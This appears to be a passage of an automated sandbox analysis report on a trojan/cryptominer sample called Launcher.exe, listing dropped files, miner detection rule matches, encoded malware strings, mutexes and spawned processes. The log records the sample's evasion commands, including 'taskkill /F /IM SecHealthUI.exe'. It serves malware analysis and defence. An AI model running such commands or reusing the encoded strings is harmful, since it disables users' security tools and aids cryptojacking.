                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043AAC129_2_0043AAC1
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00402AD029_2_00402AD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043BAD029_2_0043BAD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044A35029_2_0044A350
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040DB0D29_2_0040DB0D
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00439B1929_2_00439B19
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00441B3029_2_00441B30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_004243C029_2_004243C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044AC6029_2_0044AC60
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044B47029_2_0044B470
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040940029_2_00409400
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00424CC029_2_00424CC0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040CCD029_2_0040CCD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041ACD029_2_0041ACD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042CCD029_2_0042CCD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040C4E029_2_0040C4E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044A4E029_2_0044A4E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_004034F029_2_004034F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043DC8029_2_0043DC80
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042C48629_2_0042C486
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041FC8829_2_0041FC88
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040FCB029_2_0040FCB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041D4B829_2_0041D4B8
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00416D4329_2_00416D43
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044454229_2_00444542
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044A57029_2_0044A570
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00407D3029_2_00407D30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00446D3029_2_00446D30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042FDCC29_2_0042FDCC
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042058029_2_00420580
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043058529_2_00430585
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042ED9029_2_0042ED90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00441D9029_2_00441D90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043E5B029_2_0043E5B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041767129_2_00417671
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043567429_2_00435674
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0044A61029_2_0044A610
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041CED329_2_0041CED3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00408E8029_2_00408E80
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00403E9029_2_00403E90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0042CE9129_2_0042CE91
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00432E9E29_2_00432E9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_004436AA29_2_004436AA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00428EB029_2_00428EB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043DF5029_2_0043DF50
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0040477229_2_00404772
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043177529_2_00431775
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043B71029_2_0043B710
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00431FCA29_2_00431FCA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_004367DA29_2_004367DA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00435F8829_2_00435F88
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041DF8F29_2_0041DF8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041EF9E29_2_0041EF9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041E7AF29_2_0041E7AF
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043F7B029_2_0043F7B0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe 4DA98D39D64E332399A1B2EE3CBE4F07436A8B6FF9F35D41CCF0FF147F54D24C
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: String function: 0041ACC0 appears 85 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: String function: 0021607C appears 44 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: String function: 0021AE24 appears 34 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: String function: 0040B1D0 appears 47 times
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: String function: 0020DE10 appears 96 times
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
                      Source: Launcher.exe, 00000000.00000000.1242014140.0000000003E4D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaethersuite.exe8 vs Launcher.exe
                      Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992485687022901
                      Source: qzemwxiuzucyxcx.exe.0.dr, -Module-.csBase64 encoded string: 'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', 'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', 'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', 'H4sIAAAAAAAEACsoyixLLEnVTc7JL03RLSjKr6jUS61IBQDHDABaFwAAAA==', 'H4sIAAAAAAAEACvJTIrPzS/NK0ktAtJ5mSX5RXqpFakA87J1NBcAAAA=', 'H4sIAAAAAAAEAMvKT03Kr0jOzyspys/RS61IBQBs4Ht3EQAAAA==', 'H4sIAAAAAAAEACvLLU8sSi1OLSrLTE7VS61IBQC0nYUtEQAAAA==', 'H4sIAAAAAAAEANN1zs/NTcxLUVByTy3RDc/N9E/KSk0uUQjPzDM2ig/ILypxzs/LA4rkFykBAHOqT+4sAAAA', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8LcnKuKPOO8I2sKkkEABqEemIiAAAA', 'H4sIAAAAAAAEAAsJdA3x8PEq9ilPCvLwKTVPTa1yN3atTMrKDS40LXNO8yoBAAvBh9MiAAAA', 'H4sIAAAAAAAEAEvOL87NLzY0rsyryE5NTMszKcwyTy5JTaxIM6g0Mi4oTM4xyE02syw3MygxygIAB8r3yi0AAAA=', 'H4sIAAAAAAAEAEvKLEnOz8xLTizOsCosTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAmnXw3zYAAAA=', 'H4sIAAAAAAAEACssTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAaBdagioAAAA=', 'H4sIAAAAAAAEACvKz8vMszJxsrQwMHFxNTdKcrRMSnIzNXE2NDFLTLQwTzU2tLRwNjY0NjBPNDMGABX5YPEuAAAA', 'H4sIAAAAAAAEAAsNdPJPD800zc9xLSkzKMmODPfML/T39kkKzDNzd3TJMPJIzwsqSYtPNs52SjRJ8QUAVAnaMDAAAAA=', 'H4sIAAAAAAAEACtJLSpKNMxNNc5KTy9NTq00Kk0zL7UwLkq3zM0pqEipLM3JMM+1KEm3SM4xAgCEXmR5LAAAAA==', 'H4sIAAAAAAAEAHNxL8ssdSyJKM/2y8iP8iowqgpLLQ9LyzB1KfDNKk0ODPPONUzxMU0uziwuAwCYyGRqLAAAAA==', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8
                      Source: MicrosoftEdgeUpdate.exe.31.dr, -Module-.csBase64 encoded string: 'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', 'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', 'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', 'H4sIAAAAAAAEACsoyixLLEnVTc7JL03RLSjKr6jUS61IBQDHDABaFwAAAA==', 'H4sIAAAAAAAEACvJTIrPzS/NK0ktAtJ5mSX5RXqpFakA87J1NBcAAAA=', 'H4sIAAAAAAAEAMvKT03Kr0jOzyspys/RS61IBQBs4Ht3EQAAAA==', 'H4sIAAAAAAAEACvLLU8sSi1OLSrLTE7VS61IBQC0nYUtEQAAAA==', 'H4sIAAAAAAAEANN1zs/NTcxLUVByTy3RDc/N9E/KSk0uUQjPzDM2ig/ILypxzs/LA4rkFykBAHOqT+4sAAAA', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8LcnKuKPOO8I2sKkkEABqEemIiAAAA', 'H4sIAAAAAAAEAAsJdA3x8PEq9ilPCvLwKTVPTa1yN3atTMrKDS40LXNO8yoBAAvBh9MiAAAA', 'H4sIAAAAAAAEAEvOL87NLzY0rsyryE5NTMszKcwyTy5JTaxIM6g0Mi4oTM4xyE02syw3MygxygIAB8r3yi0AAAA=', 'H4sIAAAAAAAEAEvKLEnOz8xLTizOsCosTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAmnXw3zYAAAA=', 'H4sIAAAAAAAEACssTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAaBdagioAAAA=', 'H4sIAAAAAAAEACvKz8vMszJxsrQwMHFxNTdKcrRMSnIzNXE2NDFLTLQwTzU2tLRwNjY0NjBPNDMGABX5YPEuAAAA', 'H4sIAAAAAAAEAAsNdPJPD800zc9xLSkzKMmODPfML/T39kkKzDNzd3TJMPJIzwsqSYtPNs52SjRJ8QUAVAnaMDAAAAA=', 'H4sIAAAAAAAEACtJLSpKNMxNNc5KTy9NTq00Kk0zL7UwLkq3zM0pqEipLM3JMM+1KEm3SM4xAgCEXmR5LAAAAA==', 'H4sIAAAAAAAEAHNxL8ssdSyJKM/2y8iP8iowqgpLLQ9LyzB1KfDNKk0ODPPONUzxMU0uziwuAwCYyGRqLAAAAA==', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8
                      Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@98/41@3/7
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,29_2_00442800
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7456:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4936:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_03
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-3c38a179-f6bc-5041a1-d616db5b5627}
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeMutant created: \Sessions\1\BaseNamedObjects\GlobalSyncObj999
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\1WIN
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6972
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:436:120:WilError_03
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeJump to behavior
                      Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SecHealthUI.exe&quot;)
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
